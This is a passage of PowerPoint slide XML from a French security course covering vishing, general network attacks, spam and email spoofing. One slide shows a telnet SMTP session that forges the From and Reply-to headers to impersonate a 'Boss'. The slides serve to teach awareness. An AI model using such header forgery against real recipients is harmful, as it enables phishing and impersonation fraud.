          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>vishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (phishing basé sur la voix) ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>SpIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (Spam over Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Telephony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>) est un hameçonnage effectué sur n'importe quel système de téléphonie ou de communication vocale. Cela inclut les lignes téléphoniques traditionnelles, les services de voix sur IP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>VoIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>) et les téléphones mobiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Les appels de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>vishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> peuvent afficher un identifiant d'appelant ou un numéro de téléphone provenant de n'importe quelle source qui, selon l'attaquant, pourrait amener la victime à répondre à l'appel. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400"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69</a:t>
            </a:fld>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0550" y="1233758"/>
            <a:ext cx="2113530" cy="1388673"/>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4315" y="3592086"/>
            <a:ext cx="2286000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631471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attaques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805753"/>
            <a:ext cx="11543212" cy="5550598"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Tout ordinateur connecté à un réseau informatique est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>potentiellement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>vulnérable à une attaque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>attaque est une action malveillante destinée à porter atteinte à la sécurité d’un bien. Une attaque représente la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concrétisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>d’une menace, et nécessite l’exploitation d’une vulnérabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>attaque ne peut avoir lieu (et réussir) que si le bien est affecté par une vulnérabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sur Internet des attaques ont lieu en permanence, à raison de plusieurs attaques par minute sur chaque machine connectée. Ces attaques sont pour la plupart lancées automatiquement à partir de machines infectées (par des virus, chevaux de Troie, vers, etc.), à l’insu de leur propriétaire. Plus rarement il s’agit de l’action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’une entité malveillante.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Afin de contrer ces attaques, il est indispensable de connaître les principaux types d’attaques afin de mieux s’y préparer.</a:t>
            </a:r>
          </a:p>
          <a:p>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42866107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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5550597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>spam ou pourriel est un courrier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>électronique indésirable et/ou non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>sollicité.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>spam n'est pas seulement une publicité indésirable ; il peut également inclure du contenu malveillant et des vecteurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>d'attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Le spam est souvent utilisé comme vecteur d'attaques d'ingénierie sociale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Le spam est un problème pour de nombreuses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>raisons:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Certains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>spams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> contiennent des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>malwares tels </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>que des virus, des bombes logiques, des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>des chevaux de Troie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Certains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>spams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> véhiculent des attaques d'ingénierie sociale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(phishing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>hoax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> …).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>spams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> font </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>perdre du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>temps, et gaspillent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>les ressources Internet : capacité de stockage, cycles de calcul et débit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il ne faut jamais répondre à un spam</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70</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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l="5366" t="8369" r="3581" b="5934"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10899654" y="0"/>
            <a:ext cx="1292346" cy="1216325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24975688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8631"/>
            <a:ext cx="10515600" cy="693610"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>attaques par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="598721"/>
            <a:ext cx="9805416" cy="557222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spam (email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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l="5366" t="8369" r="3581" b="5934"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10899654" y="0"/>
            <a:ext cx="1292346" cy="1216325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168790" y="4170372"/>
            <a:ext cx="4774146" cy="2460545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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$telnet mail.server.com 25</a:t>
            </a:r>
            <a:endPar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&gt;HELO univ.com</a:t>
            </a:r>
            <a:b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b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&gt;MAIL FROM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sender@server.com</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:b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b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&gt;RCPT TO: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>receiver@server.com</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:endPar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&gt;DATA</a:t>
            </a:r>
            <a:endPar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&gt;From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sender@server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng"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&gt;</a:t>
            </a:r>
            <a:endPar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&gt;To: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>receiver@server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng"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&gt;</a:t>
            </a:r>
            <a:endPar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a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Subject</a:t>
            </a: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 Titre du message</a:t>
            </a:r>
            <a:b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b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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"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Date: </a:t>
            </a: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May 6th, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"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2021</a:t>
            </a:r>
            <a:endPar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&gt;Le corps du message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6644353" y="4170372"/>
            <a:ext cx="4774146" cy="2661370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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$telnet mail.server.com 25</a:t>
            </a:r>
            <a:endPar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&gt;HELO univ.com</a:t>
            </a:r>
            <a:b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b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&gt;MAIL FROM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sender@server.com</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:b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b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&gt;RCPT TO: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>receiver@server.com</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:endPar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&gt;DATA</a:t>
            </a:r>
            <a:endPar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&gt;From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Boss &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>boss@server.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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&gt;To: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>receiver@server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng"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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"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  &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1"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-to:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Boss &lt;sender@server.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
